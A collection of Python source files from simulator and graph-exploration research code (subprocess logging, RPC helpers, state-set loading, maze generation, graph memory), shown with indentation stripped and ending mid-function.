#### File: lib/util/BackgroundPOpen.py
```python
import subprocess as sp
from threading import Thread
# http://stackoverflow.com/questions/35488927/send-subprocess-popen-stdout-stderr-to-logging-module
class BackgroundPopen(sp.Popen):
@staticmethod
def _proxy_lines(pipe, line_handler, exit_handler=None):
with pipe:
while True:
line = pipe.readline()
if line:
if line_handler is not None:
line_handler(line.rstrip())
else:
break
if exit_handler is not None:
exit_handler()
def __init__(self, name, logger, out_handler, err_handler, *args, **kwargs):
kwargs['stdout'] = sp.PIPE
kwargs['stderr'] = sp.PIPE
super(self.__class__, self).__init__(*args, **kwargs)
self.name = name
self._logger = logger
out_exit_handler = None
err_exit_handler = None
if logger is not None:
out_exit_handler = lambda: logger.info('Finished %s stdout' % self.name)
if out_handler is None:
out_handler = lambda line: logger.info(line)
err_exit_handler = lambda: logger.info('Finished %s stderr' % self.name)
if err_handler is None:
err_handler = lambda line: logger.error(line)
t = Thread(name=name + '_out', target=self._proxy_lines, args=[self.stdout, out_handler, out_exit_handler])
t.daemon = True
t.start()
self._thread_out = t
t2 = Thread(name=name + '_err', target=self._proxy_lines, args=[self.stderr, err_handler, err_exit_handler])
t2.daemon = True
t2.start()
self._thread_err = t2
def flush(self):
# flush logger
# TODO: this hangs, how to flush stdout and stderr?
# try:
# self.stdout.flush()
# except:
# # pretend nothing happened
# pass
#
# try:
# self.stderr.flush()
# except:
# # pretend nothing happened
# pass
if self._logger is not None:
for handler in self._logger.handlers:
handler.flush()
def close(self):
if self._thread_out is not None:
if self._logger is not None:
self._logger.info('Waiting for %s stdout to finish' % self.name)
self._thread_out.join()
self._thread_out = None
if self._thread_err is not None:
if self._logger is not None:
self._logger.info('Waiting for %s stderr to finish' % self.name)
self._thread_err.join()
self._thread_err = None
self.flush()
def __del__(self):
self.close()
super(self.__class__, self).__del__(self)
```
#### File: lib/util/RpcCall.py
```python
import numpy as np
class RpcCall:
""" Super basic RPC Call """
def __init__(self, sio, rpcid, logger):
self.sio = sio
self.id = rpcid
self.logger = logger
self.name = None
self.response = None
self.result = None
self.callback = None
def call(self, name, data=None, callback=None, seconds=None, check_wait=None):
self.name = name
self.callback = callback
#self.logger.info('Call %s emit' % name)
self.sio.emit(name, data, self._handle_response)
#self.logger.info('Call %s waiting...' % name)
if check_wait is not None and seconds is not None:
# loop and wait until check is true or response is received
#self.logger.info('Call %s checked waiting %d ...' % (name, seconds))
while self.response is None and check_wait() and self.sio.connected:
self.sio.wait_for_callbacks(seconds=seconds) # wait for response
else:
#self.logger.info('Call %s waiting %d ...' % (name, seconds))
self.sio.wait_for_callbacks(seconds=seconds) # wait for response
#self.logger.info('Call %s done' % name)
return self.result
def _parse_array(self, array):
# TODO: Handle endianness correctly
datatype = array.get('datatype')
data = array.get('data')
if datatype == 'int8':
dt = np.dtype('i1')
return np.frombuffer(data, dtype=dt)
elif datatype == 'uint8':
dt = np.dtype('u1')
return np.frombuffer(data, dtype=dt)
elif datatype == 'int16':
dt = np.dtype('i2')
return np.frombuffer(data, dtype=dt)
elif datatype == 'uint16':
dt = np.dtype('u2')
return np.frombuffer(data, dtype=dt)
elif datatype == 'int32':
dt = np.dtype('i4')
return np.frombuffer(data, dtype=dt)
elif datatype == 'uint32':
dt = np.dtype('u4')
return np.frombuffer(data, dtype=dt)
elif datatype == 'float32':
dt = np.dtype('f4')
return np.frombuffer(data, dtype=dt)
elif datatype == 'float64':
dt = np.dtype('f8')
return np.frombuffer(data, dtype=dt)
else:
if self.logger:
self.logger.error('Unknown datatype %s when processing %s' % (datatype, self.name))
return array
def _parse_data(self, value, key=None, parent=None, path=[]):
#if len(path) > 0:
# ('parse_data %s' % path)
if type(value) is dict:
if value.get('type') == 'array' and 'datatype' in value:
# Special array buffer - let's process it!
value = self._parse_array(value)
if parent is not None:
parent[key] = value
else:
for k, v in value.items():
if type(v) is dict or type(v) is list:
self._parse_data(v, key=k, parent=value, path=path + [k])
elif type(value) is list and len(value) > 0:
for k, v in enumerate(value):
if type(v) is dict or type(v) is list:
self._parse_data(v, key=k, parent=value, path=path + [k])
return value
def _handle_response(self, data):
# process things that proclaim themselves to be array with data
self.response = self._parse_data(data)
if self.logger:
if self.response is not None and self.response.get('status') == 'error':
self.logger.error('Error calling %s: %s' % (self.name, self.response.get('message')))
if self.callback is not None:
self.result = self.callback(self.response)
else:
self.result = self.response
```
#### File: lib/util/StateSet.py
```python
import bz2
import csv
import collections
import math
from enum import Enum
class Select(Enum):
FIRST = 'first'
RANGE_KEY = 'range_key'
RANGE_VALUE = 'range_value'
class SelectPolicy:
def __init__(self, policy, field=None):
self.policy = policy
self.field = field
class StateSet:
""" Wrapper for set of episode val/test states """
def __init__(self, scenes_file=None, states_files=None,
scene_filter=None, episode_filter=None, max_states_per_scene=None,
select_policy=SelectPolicy(Select.FIRST)):
self.states = []
self.scenes = []
self.scenes_by_id = {}
self.states_by_scene = {}
self.select_policy = select_policy
if scenes_file:
self._load_scenes(scenes_file, scene_filter)
if states_files:
if type(states_files) is str:
self._load_states(states_files, max_states_per_scene, episode_filter)
elif isinstance(states_files, collections.Iterable):
for states_file in states_files:
self._load_states(states_file, max_states_per_scene, episode_filter)
self._embed_states_in_scenes()
def get_splits(self, max_states_per_scene=None):
"""Get dictionary of StateSets keyed by scene 'set' i.e. dataset split"""
scenes_by_split = {}
for scene in self.scenes:
scenes_by_split.setdefault(scene['set'], []).append(scene)
state_sets_dict = {}
for split, scenes in scenes_by_split.items():
ss = StateSet()
ss._populate_from_lists(scenes, self.states_by_scene, max_states_per_scene)
state_sets_dict[split] = ss
return state_sets_dict
def get_scenes(self):
return self.scenes
def get_states(self):
return self.states
def get_states_by_scene_id(self, scene_id):
return self.states_by_scene[scene_id]
def _select_n_states(self, states, n):
# Select n states from big list of states
policy = self.select_policy.policy
field = self.select_policy.field
if n is not None and n < len(states):
if policy == Select.FIRST:
if field is not None:
# sort by field
states = sorted(states, key=lambda x: x[field])
return states[:n]
elif policy == Select.RANGE_KEY:
# sort by field
states = sorted(states, key=lambda x: x[field])
# select by evenly dividing indices
r = len(states)/float(n)
selected = []
for i in range(n):
si = int(math.floor(math.ceil(r*i)/2))
selected.append(states[si])
return selected
elif policy == Select.RANGE_VALUE:
# sort by field and get range (value)
states = sorted(states, key=lambda x: x[field])
fmin = states[0][field]
fmax = states[-1][field]
# print('Range is %f to %f' % (fmin,fmax))
# from range, divide up into n buckets
r = (fmax-fmin)/float(n)
buckets = []
for i in range(n):
buckets.append([])
for state in states:
bi = int(min(math.ceil((state[field] - fmin)/r), n-1))
buckets[bi].append(state)
# make sure all buckets have something
for i, bucket in enumerate(buckets):
if len(bucket) == 0:
# print('Nothing in bucket %d' % i)
# still some from other buckets
pi = max(i-1, 0)
ni = min(i+1, n-1)
nlen = len(buckets[ni])
plen = len(buckets[pi])
if nlen > plen:
# take half from bucket[ni] and put in current bucket
k = math.floor(nlen/2)
buckets[i] = buckets[ni][:k]
buckets[ni] = buckets[ni][k:]
else:
k = math.floor(plen/2)
buckets[i] = buckets[pi][:k]
buckets[pi] = buckets[pi][k:]
selected = []
for bucket in buckets:
bii = math.floor(len(bucket)/2)
selected.append(bucket[bii])
return selected
else:
raise ValueError('Unsupported select_policy ' + policy)
else:
return states
def _populate_from_lists(self, my_scenes, my_states_by_scene, max_states_per_scene):
self.scenes = my_scenes
for scene in my_scenes:
scene_id = scene['id']
self.scenes_by_id[scene_id] = scene
if scene_id in my_states_by_scene:
my_states = self._select_n_states(my_states_by_scene[scene_id], max_states_per_scene)
self.states_by_scene[scene_id] = my_states
self.states += my_states
def _load_scenes(self, filename, scene_filter):
with bz2.open(filename, 'rt') if filename.endswith('bz2') else open(filename) as f:
reader = csv.DictReader(f)
self.scenes = []
for r in reader:
for v in ['nrooms', 'nobjects', 'nlevels']:
if v in r:
r[v] = int(r[v])
for v in ['dimX', 'dimY', 'dimZ', 'floorArea']:
if v in r:
r[v] = float(r[v])
if scene_filter and not scene_filter(r):
continue
self.scenes.append(r)
self.scenes_by_id[r['id']] = r
self.scenes.sort(key=lambda x: x['nobjects'])
def _load_states(self, filename, max_states_per_scene, state_filter):
with bz2.open(filename, 'rt') if filename.endswith('bz2') else open(filename) as f:
reader = csv.DictReader(f)
all_states = [r for r in reader]
# Convert scene state and group by sceneId
counter = 0
for r in all_states:
for v in ['startX', 'startY', 'startZ', 'startAngle', 'goalX', 'goalY', 'goalZ', 'dist', 'pathDist']:
r[v] = float(r[v]) if v in r else None
for v in ['episodeId', 'pathNumDoors', 'pathNumRooms', 'level']:
r[v] = int(r[v]) if v in r else None
scene_id = r['sceneId']
scene_states = self.states_by_scene.setdefault(scene_id, [])
rec = {
'episode_id': counter,
'scene_id': r['sceneId'],
'room_id': r['roomId'],
'start': {'position': [r['startX'], r['startY'], r['startZ']], 'angle': r['startAngle']},
'goal': {'id': r['goalObjectId'], 'position': [r['goalX'], r['goalY'], r['goalZ']]},
'dist': r['dist']
}
for k in ['pathDist', 'pathNumRooms', 'pathRoomIds', 'pathNumDoors', 'pathDoorIds', 'level']:
if k in r:
rec[k] = r[k]
if not state_filter or state_filter(rec):
scene_states.append(rec)
counter = counter + 1
# Filter down to states per scene and create big list of all scenes
states = []
for scene_id, scene_states in self.states_by_scene.items():
self.states_by_scene[scene_id] = self._select_n_states(scene_states, max_states_per_scene)
states += self.states_by_scene[scene_id]
self.states = states
def _embed_states_in_scenes(self):
for state in self.states:
scene_id = state['scene_id']
if scene_id in self.scenes_by_id:
self.scenes_by_id[scene_id].setdefault('states', []).append(state)
scenes_with_no_states = []
for i, scene in enumerate(self.scenes):
if 'states' not in scene or len(scene['states']) == 0:
scenes_with_no_states.append(scene['id'])
del self.scenes_by_id[scene['id']]
self.scenes = [s for s in self.scenes if s['id'] not in scenes_with_no_states]
#print('Removed scenes with no episode states: ' + ','.join(scenes_with_no_states))
def main():
import argparse
# Argument processing
parser = argparse.ArgumentParser(description='Load state set')
parser.add_argument('-n', '--limit',
type=int,
help='Number of states per scene')
parser.add_argument('--select',
default=Select.FIRST,
type=Select,
help='Number of states per scene')
parser.add_argument('--field',
default=None,
help='Field to use for selection')
parser.add_argument('--scenes',
type=str,
default=None,
help='Scenes file to load')
parser.add_argument('input',
help='Input file to load')
args = parser.parse_args()
state_set = StateSet(scenes_file=args.scenes,
states_files=args.input,
max_states_per_scene=args.limit,
select_policy=SelectPolicy(args.select, args.field))
for state in state_set.states:
print(state)
if __name__ == "__main__":
main()
```
#### File: minos/tools/console_client.py
```python
import argparse
import curses
import math
import numpy as np
import traceback
from minos.config.sim_args import parse_sim_args
from minos.lib import common
from minos.lib.Simulator import Simulator
def _interactive_loop(stdscr, sim, scene_ids, scene_index):
common.attach_exit_handler(sim)
stdscr.timeout(1000) # Set timeout to 1 second before running loop again
curses.cbreak()
stdscr.keypad(1)
stdscr.addstr(0, 10, "Interactive mode (WASD + UP/DOWN). Hit 'q' to quit")
stdscr.refresh()
stdscr.move(1, 15)
action_strength = 1 # Acceleration multiplier for actions
look_angle = math.radians(15) # Look up/down increment in radians
print('IJKL+Arrows = move agent, N = next_scene, Q = quit, other keys = idle')
while sim.running:
key = stdscr.getch()
if key < 0:
continue # check if we should exit
elif key == ord('q'):
break
action = {'name': 'idle', 'strength': action_strength, 'angle': look_angle}
stdscr.clrtobot()
stdscr.refresh()
if key == ord('i'):
stdscr.addstr(1, 20, 'forward ')
action['name'] = 'forwards'
elif key == ord('k'):
stdscr.addstr(1, 20, 'backward ')
action['name'] = 'backwards'
elif key == ord('j'):
stdscr.addstr(1, 20, 'turn_left ')
action['name'] = 'turnLeft'
elif key == ord('l'):
stdscr.addstr(1, 20, 'turn_right ')
action['name'] = 'turnRight'
elif key == ord('n'):
scene_index = (scene_index + 1) % len(scene_ids)
stdscr.addstr(1, 20, 'next_scene loading %s ...' % scene_ids[scene_index])
sim.set_scene(scene_ids[scene_index])
stdscr.refresh()
sim.start()
stdscr.addstr(1, 20, 'next_scene %s' % scene_ids[scene_index])
stdscr.clrtoeol()
stdscr.refresh()
elif key == ord('r'):
sim.restart(randomize_ports=True)
elif key == curses.KEY_LEFT:
stdscr.addstr(1, 20, 'strafe_left ')
action['name'] = 'strafeLeft'
elif key == curses.KEY_RIGHT:
stdscr.addstr(1, 20, 'strafe_right ')
action['name'] = 'strafeRight'
elif key == curses.KEY_UP:
stdscr.addstr(1, 20, 'look_up ')
action['name'] = 'lookUp'
elif key == curses.KEY_DOWN:
stdscr.addstr(1, 20, 'look_down ')
action['name'] = 'lookDown'
else:
stdscr.addstr(1, 20, 'idling ')
action['name'] = 'idle'
stdscr.clrtobot()
stdscr.move(1, 15)
stdscr.refresh()
response = sim.step(action, 1)
observation = response.get('observation') if response is not None else None
if observation is not None:
nrow = 3
simple_observations = {k:v for k,v in observation.items() if k not in ['measurements', 'sensors']}
dicts = [simple_observations, observation.get('measurements'), observation.get('sensors')]
for d in dicts:
for k, v in d.items():
if type(v) is not dict:
info = '%s: %s' % (k,v)
stdscr.addstr(nrow, 20, info[:75] + (info[75:] and '..'))
nrow += 1
else:
stdscr.addstr(nrow, 20, '%s: %s' % (k, str({i: v[i] for i in v if type(v[i]) is not bytearray and type(v[i]) is not np.ndarray})))
nrow += 1
stdscr.move(1, 15)
def interactive_loop(sim, scene_ids, scene_index):
def run_loop(stdscr):
_interactive_loop(stdscr, sim, scene_ids, scene_index)
curses.wrapper(run_loop)
print('Thank you for playing - Goodbye!')
def main():
parser = argparse.ArgumentParser(description='Simulator console client')
args = parse_sim_args(parser)
sim = Simulator(vars(args))
try:
print('Starting simulator...')
if sim.start():
print('Simulator started.')
interactive_loop(sim, args.scene_ids, 0)
except:
traceback.print_exc()
print('Error running simulator. Aborting.')
if sim is not None:
sim.kill()
del sim
if __name__ == "__main__":
main()
``` |
{
"source": "johny-c/noge",
"score": 3
} |
#### File: noge/noge/data_loaders.py
```python
import numpy as np
import torch.utils.data as tud
from sklearn.model_selection import train_test_split
from noge.constants import REAL_DATASETS, PLACES, DATA_DIR
from xlog.utils import load_pickle
class GraphDataset(tud.Dataset):
def __init__(self, graphs, mazes=None):
self.graphs = graphs
self.mazes = mazes
self.num_nodes_per_graph = np.array([G.number_of_nodes() for G in graphs], dtype=int)
self.num_edges_per_graph = np.array([G.number_of_edges() for G in graphs], dtype=int)
n_graphs = len(graphs)
self._pairs = [(g, s) for g in range(n_graphs) for s in graphs[g].nodes]
graph_idx, sources = zip(*self._pairs)
self.samples_graph_idx = np.array(graph_idx)
self._samples_sources = np.array(sources)
def __len__(self):
return len(self._pairs)
def __getitem__(self, item):
graph_index, source = self._pairs[item]
graph = self.graphs[graph_index]
sample = dict(graph=graph, source=source)
if self.mazes is not None:
sample.update(maze=self.mazes[graph_index])
return sample
@property
def max_nodes(self):
return max(self.num_nodes_per_graph)
@property
def max_edges(self):
return max(self.num_edges_per_graph)
@property
def num_graphs(self):
return len(self.graphs)
class SubsetSampler(tud.Sampler):
def __init__(self, dataset, seed, num_samples=50):
assert num_samples <= len(dataset)
self.dataset = dataset
self.seed = seed
self.rng = np.random.RandomState(seed=seed)
# for evaluation only choose pairs once (to be consistent across epochs)
n_graphs = len(dataset.graphs)
if n_graphs >= num_samples:
# sample one source node per graph
num_nodes_per_graph = self.dataset.num_nodes_per_graph
indices = []
offset = 0
for num_nodes in num_nodes_per_graph:
# num_nodes = num_nodes_per_graph[g]
index = self.rng.randint(num_nodes)
indices.append(offset + index)
offset += num_nodes
if len(indices) == num_samples:
break
self._indices = indices
else:
# the number of graphs is less than the required num_samples
n_total = len(dataset)
if n_total <= num_samples:
# if the total number of samples is less than or equal to required, use all samples
self._indices = list(range(n_total))
else:
# if the total number of samples is larger than required, sub-sample
self._indices = self.rng.choice(n_total, size=num_samples, replace=False).tolist()
self._indices.sort()
def __iter__(self):
return iter(self._indices)
def __len__(self):
return len(self._indices)
def get_test_loader(dataset, seed, num_samples):
sampler = SubsetSampler(dataset, seed=seed, num_samples=num_samples)
# set batch_size = None to get each sample without a batch dimension
# set collate_fn = identity to not trigger auto_collate which converts to torch types
loader = tud.DataLoader(dataset=dataset, batch_size=None,
collate_fn=lambda x: x, sampler=sampler)
return loader
class BalancedInfiniteRandomSampler:
""" Sample each graph with equal probability (in the limit) """
def __init__(self, dataset, seed, cycle_size=100_000, replace=True):
self.dataset = dataset
self.seed = seed
self.rng = np.random.RandomState(seed=seed)
# each node's weight should be proportional to 1 over the graph size of the node
inverse_graph_sizes = 1. / dataset.num_nodes_per_graph
self.p = inverse_graph_sizes[dataset.samples_graph_idx]
self.p = self.p / self.p.sum()
# self.weights = torch.as_tensor(self.p, dtype=torch.double)
self.cycle_size = cycle_size
self.replacement = replace
def __iter__(self):
while True:
# sample once every `cycle_size` (rng.choice is slow)
indices = self.rng.choice(len(self.dataset), self.cycle_size, self.replacement, p=self.p).tolist()
# items = torch.multinomial(self.weights, self.cycle_size, self.replacement).tolist()
for index in indices:
yield index
def get_train_generator(dataset, seed):
sampler = BalancedInfiniteRandomSampler(dataset, seed)
sampler_iter = iter(sampler)
while True:
index = next(sampler_iter)
sample = dataset[index]
yield sample
def _get_real_graph(dataset):
proc_dir = DATA_DIR / 'osm' / 'processed'
# get place and name
place = PLACES[dataset]
name = place['city'].replace(' ', '')
path_train = proc_dir / f"{name}_train.pkl"
path_test = proc_dir / f"{name}_test.pkl"
train_graph = load_pickle(path_train)
test_graph = load_pickle(path_test)
train_set = GraphDataset([train_graph])
test_set = GraphDataset([test_graph])
return train_set, test_set
def get_datasets(dataset, seed, test_size, val_size=0):
if dataset in REAL_DATASETS:
return _get_real_graph(dataset)
path_graphs = DATA_DIR / f"{dataset}.pkl"
graphs = load_pickle(path_graphs)
graphs_train, graphs_test = train_test_split(graphs, test_size=test_size, random_state=seed)
graphs_val = None
if val_size > 0:
graphs_train, graphs_val = train_test_split(graphs_train, test_size=val_size, random_state=seed)
mazes_train = None
mazes_test = None
mazes_val = None
if dataset in ('maze', 'hypermaze'):
graphs_train, mazes_train = zip(*graphs_train)
graphs_test, mazes_test = zip(*graphs_test)
if graphs_val is not None:
graphs_val, mazes_val = zip(*graphs_val)
train_set = GraphDataset(graphs_train, mazes_train)
test_set = GraphDataset(graphs_test, mazes_test)
if graphs_val is not None:
val_set = GraphDataset(graphs_val, mazes_val)
return train_set, val_set, test_set
return train_set, test_set
```
#### File: noge/envs/dfp_wrapper.py
```python
import gym
import numpy as np
def make_goal(meas_coeffs, temporal_coeffs):
goal = meas_coeffs.reshape(1, -1) * temporal_coeffs.reshape(-1, 1)
return goal.astype(np.float32).ravel()
class TargetMeasEnvWrapper(gym.Wrapper):
def __init__(self, env, meas_coeffs, temporal_coeffs, sample_goals, goal_space='pos_neg'):
assert goal_space in ('pos', 'pos_neg')
assert isinstance(env.observation_space, gym.spaces.Dict), \
f"{self.__class__.__name__} expects dictionary observations."
super().__init__(env)
self.meas_coeffs = meas_coeffs
self.temporal_coeffs = temporal_coeffs
self.sample_goals = sample_goals
self.goal_space = goal_space
self._fixed_goal = make_goal(meas_coeffs, temporal_coeffs)
self._episode_goal = None
spaces = env.observation_space.spaces
g = self._fixed_goal
low = -1 if goal_space == 'pos_neg' else 0
spaces.update(goal=gym.spaces.Box(low=low, high=1, shape=g.shape, dtype=g.dtype))
self.observation_space = gym.spaces.Dict(spaces)
def reset(self, **kwargs):
if self.sample_goals:
self._episode_goal = self._sample_goal() # sample goals during training
else:
self._episode_goal = self._fixed_goal.copy() # set true goal during inference
# obs should be a dict, containing keys 'meas' and 'goal'
obs = self.env.reset(**kwargs)
obs.update(goal=self._episode_goal)
return obs
def _sample_goal(self):
# sample random measurement from [0, 1]
dim_meas = len(self.meas_coeffs)
meas = self.rng.uniform(size=dim_meas)
if self.goal_space == 'pos_neg': # sample from [-1, 1]
meas = 2 * meas - 1
# goal is just a copy of the measurement over the temporal dimension
goal = make_goal(meas, self.temporal_coeffs)
return goal
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs.update(goal=self._episode_goal)
return obs, reward, done, info
```
#### File: noge/envs/maze_graph.py
```python
import numpy as np
import networkx as nx
def make_maze(width=81, height=51, complexity=.75, density=.75):
r"""Generate a random maze array.
It only contains two kind of objects, obstacle and free space. The numerical value for obstacle
is ``1`` and for free space is ``0``.
Code from https://en.wikipedia.org/wiki/Maze_generation_algorithm
>>> make_maze(10, 10)
array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]], dtype=uint8)
"""
# Only odd shapes
shape = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)
# Adjust complexity and density relative to maze size
complexity = int(complexity * (5 * (shape[0] + shape[1])))
density = int(density * ((shape[0] // 2) * (shape[1] // 2)))
# Build actual maze
Z = np.zeros(shape, dtype=bool)
# Fill borders
Z[0, :] = Z[-1, :] = 1
Z[:, 0] = Z[:, -1] = 1
# Make aisles
for i in range(density):
x, y = np.random.randint(0, shape[1] // 2 + 1) * 2, np.random.randint(0, shape[0] // 2 + 1) * 2
Z[y, x] = 1
for j in range(complexity):
neighbours = []
if x > 1: neighbours.append((y, x - 2))
if x < shape[1] - 2: neighbours.append((y, x + 2))
if y > 1: neighbours.append((y - 2, x))
if y < shape[0] - 2: neighbours.append((y + 2, x))
if len(neighbours):
y_, x_ = neighbours[np.random.randint(0, len(neighbours))]
if Z[y_, x_] == 0:
Z[y_, x_] = 1
Z[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1
x, y = x_, y_
return Z.astype(np.uint8)
def maze_to_graph(maze):
"""We use the convention that the maze cell at row y, col x
has label(x, y) = y*num_cols + x.
Equivalently, the node with label u corresponds to the
maze cell at row y, col x = label // num_cols, label % num_cols
:param maze: np.array of shape (num_rows, num_cols)
:return: nx.Graph
"""
n_rows, n_cols = maze.shape
# Find free cells
free_mask = maze == 0
# Grid has implicit naming 0, ..., N-1 \\ N, N+2, ..., 2N-1 \\ 2N, ...
# node_id = row * n_cols + col
# horizontal neighbors (first N-1 cols to last N-1 cols)
horizontal_edges_mask = np.logical_and(free_mask[:, :-1], free_mask[:, 1:]) # (N, M-1)
# nodes at (y, x) are connected to (y, x+1)
yy, xx = np.where(horizontal_edges_mask)
node_id = yy * n_cols + xx
edges = [(v, v + 1) for v in node_id]
# vertical neighbors (first N-1 rows to last N-1 rows)
vertical_edges_mask = np.logical_and(free_mask[:-1], free_mask[1:]) # (N-1, M)
# nodes at (y, x) are connected to (y+1, x)
yy, xx = np.where(vertical_edges_mask)
node_id = yy * n_cols + xx
edges.extend([(v, v + n_cols) for v in node_id])
graph = nx.from_edgelist(edges)
return graph
def maze_to_pos(maze):
n_rows, n_cols = maze.shape
yy, xx = np.where(maze == 0) # yy = row, xx = col
node_id = yy * n_cols + xx
pos = {i: (x, y) for i, y, x in zip(node_id, yy, xx)}
return pos
```
#### File: noge/graph_memories/base_memory.py
```python
import numpy as np
from noge.data_types import GraphObservation, PartialGraphObservation
class OnlineGraphMemory:
extra_keys = ['bf', '<KEY>']
def __init__(self, max_nodes, max_edges, max_episode_steps, pos_label=1, neg_label=0):
self.max_nodes = max_nodes
self.max_edges = max_edges
self.pos_label = pos_label
self.neg_label = neg_label
self.dim_node = None
self.num_nodes = 0
self.num_edges = 0
self.time = 0
# data
max_timesteps = min(max_nodes, max_episode_steps + 1)
self.max_timesteps = max_timesteps
self.visited_seq = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.edge_index = np.empty(shape=(2, max_edges), dtype=np.int64)
self.frontier = []
self.x = None
self.cum_path_lengths = np.empty(shape=(max_timesteps,), dtype=np.float32)
self.exploration_rates = np.empty(shape=(max_timesteps,), dtype=np.float32)
# extra data
self.store = {key: np.full(shape=(max_timesteps,), fill_value=-1, dtype=np.int64) for key in self.extra_keys}
def clear(self):
self.frontier.clear()
self.x.fill(self.neg_label)
self.num_nodes = 0
self.num_edges = 0
def update(self, partial_graph_obs: PartialGraphObservation):
# extract time step
t = partial_graph_obs['t']
new_edges = partial_graph_obs['new_edges'] # array of shape [2, ΔΜ]
new_nodes = partial_graph_obs['new_nodes']
visited_node = partial_graph_obs['visited_node']
cost = partial_graph_obs['path_cost']
# reset and update frontier
if t == 0:
self.clear()
self.frontier.extend(new_nodes)
self.frontier.remove(visited_node)
self.cum_path_lengths[t] = cost # 0
# self.exploration_rates[t] = 0
else:
self.frontier.remove(visited_node)
self.frontier.extend(new_nodes)
self.cum_path_lengths[t] = cost + self.cum_path_lengths[t-1]
# self.exploration_rates[t] = t / self.cum_path_lengths[t]
# update node and edge counts
self.num_nodes += len(new_nodes)
# update edges
m_old = self.num_edges
m_new = m_old + new_edges.shape[1]
self.edge_index[:, m_old:m_new] = new_edges
self.num_edges = m_new
# update visited sequence
self.visited_seq[t] = visited_node
# update nn, bf, df
for key in self.extra_keys:
self.store[key][t] = partial_graph_obs[key]
# update time
self.time = t
def get(self) -> GraphObservation:
# retrieve graph state at time t
t = self.time
n = self.num_nodes
m = self.num_edges
obs = GraphObservation(x=self.x[:n],
edge_index=self.edge_index[:, :m],
frontier=np.array(self.frontier),
visited_seq=self.visited_seq[:t+1]
)
return obs
def get_frontier(self):
return self.frontier
class OfflineGraphMemory:
extra_keys = ['<KEY>']
def __init__(self, max_nodes, max_edges, max_episode_steps, pos_label=1, neg_label=0):
self.max_nodes = max_nodes
self.max_edges = max_edges
self.pos_label = pos_label
self.neg_label = neg_label
self.dim_node = None
# data
max_timesteps = min(max_nodes, max_episode_steps + 1)
self.max_timesteps = max_timesteps
self.visited_seq = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.edge_index = np.empty(shape=(2, max_edges), dtype=np.int64)
# time -> counts for reconstructing history
self.node_counts = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.edge_counts = np.empty(shape=(max_timesteps,), dtype=np.int64)
self.cum_path_lengths = np.empty(shape=(max_timesteps,), dtype=np.float32)
self.exploration_rates = np.empty(shape=(max_timesteps,), dtype=np.float32)
# node -> time step for reconstructing history (each node is discovered once and visited once)
self.discovery_times = np.full(shape=(max_nodes,), fill_value=max_timesteps + 1, dtype=np.int64)
self.visit_times = np.full(shape=(max_nodes,), fill_value=max_timesteps + 1, dtype=np.int64)
# extra data
self.store = {key: np.full(shape=(max_timesteps,), fill_value=-1, dtype=np.int64) for key in self.extra_keys}
def update(self, partial_graph_obs: PartialGraphObservation):
# extract time step
t = partial_graph_obs['t']
new_edges = partial_graph_obs['new_edges'] # array of shape [2, ΔΜ]
discovered_nodes = partial_graph_obs['new_nodes']
visited_node = partial_graph_obs['visited_node']
cost = partial_graph_obs['path_cost']
if t == 0:
n_old = 0
m_old = 0
self.cum_path_lengths[t] = cost
# self.exploration_rates[t] = 0
else:
n_old = self.node_counts[t-1]
m_old = self.edge_counts[t-1]
self.cum_path_lengths[t] = cost + self.cum_path_lengths[t-1]
# self.exploration_rates[t] = t / self.cum_path_lengths[t]
n_new = n_old + len(discovered_nodes)
m_new = m_old + new_edges.shape[1]
# update counts history
self.edge_counts[t] = m_new
self.node_counts[t] = n_new
# update edges
self.edge_index[:, m_old:m_new] = new_edges
# update visited sequence
self.visited_seq[t] = visited_node
# update nn, bf, df
for key in self.extra_keys:
self.store[key][t] = partial_graph_obs[key]
# update times
self.discovery_times[discovered_nodes] = t # time step the nodes were discovered
self.visit_times[visited_node] = t # time step the nodes were visited
def sample(self, t: int) -> GraphObservation:
raise NotImplementedError
```
#### File: noge/graph_memories/categorical.py
```python
import numpy as np
from noge.data_types import GoalPartialObservation, GraphObservation
from .base_memory import OnlineGraphMemory, OfflineGraphMemory
class CategoricalOnlineMemory(OnlineGraphMemory):
""" Maintain a node features array that is incrementally updated (no copy) """
def __init__(self, max_nodes, max_edges, max_episode_steps, history, features, pos_label, neg_label):
super().__init__(max_nodes, max_edges, max_episode_steps, pos_label, neg_label)
self.history = history
self.cat_features = features
# features 'CYF' + cat_features = {B, D, N}
self.feat_flags = {key: flag in features for flag, key in zip("BDN", self.extra_keys)}
self.num_features = 3 + sum(self.feat_flags.values())
self._last_path_nodes = None
self.dim_node = history * self.num_features
self.x = np.full(shape=(max_nodes, self.dim_node), fill_value=self.neg_label, dtype=np.float32)
self.offsets = list(range(0, self.dim_node, history))
def update(self, partial_graph_obs: GoalPartialObservation):
n_old = self.num_nodes
super().update(partial_graph_obs)
n_new = self.num_nodes
visited_node = partial_graph_obs['visited_node']
# update node features in place
pos = self.pos_label
neg = self.neg_label
x = self.x
t = self.time
d = self.num_features
D = self.dim_node # D = d * h
# for the previously known nodes, shift all features 1 position to the left
dims_past = D - d
x[:n_old, :dims_past] = x[:n_old, d:]
# in the present, the changes are:
# C Y F B D N
# C: visited node is now in the visited set
col = dims_past
if t > 0:
previous_node = self.visited_seq[t - 1]
x[previous_node, col] = pos
if 'X' not in self.cat_features:
x[visited_node, col] = pos
# Y: visited node is current, previous node is not current
col += 1
if t > 0:
previous_node = self.visited_seq[t-1]
x[previous_node, col] = neg
x[visited_node, col] = pos
# F: visited node is no longer in the frontier, new nodes are
col += 1
x[n_old:n_new, col] = pos
x[visited_node, col] = neg
# BDN
for key in self.extra_keys:
if self.feat_flags[key]:
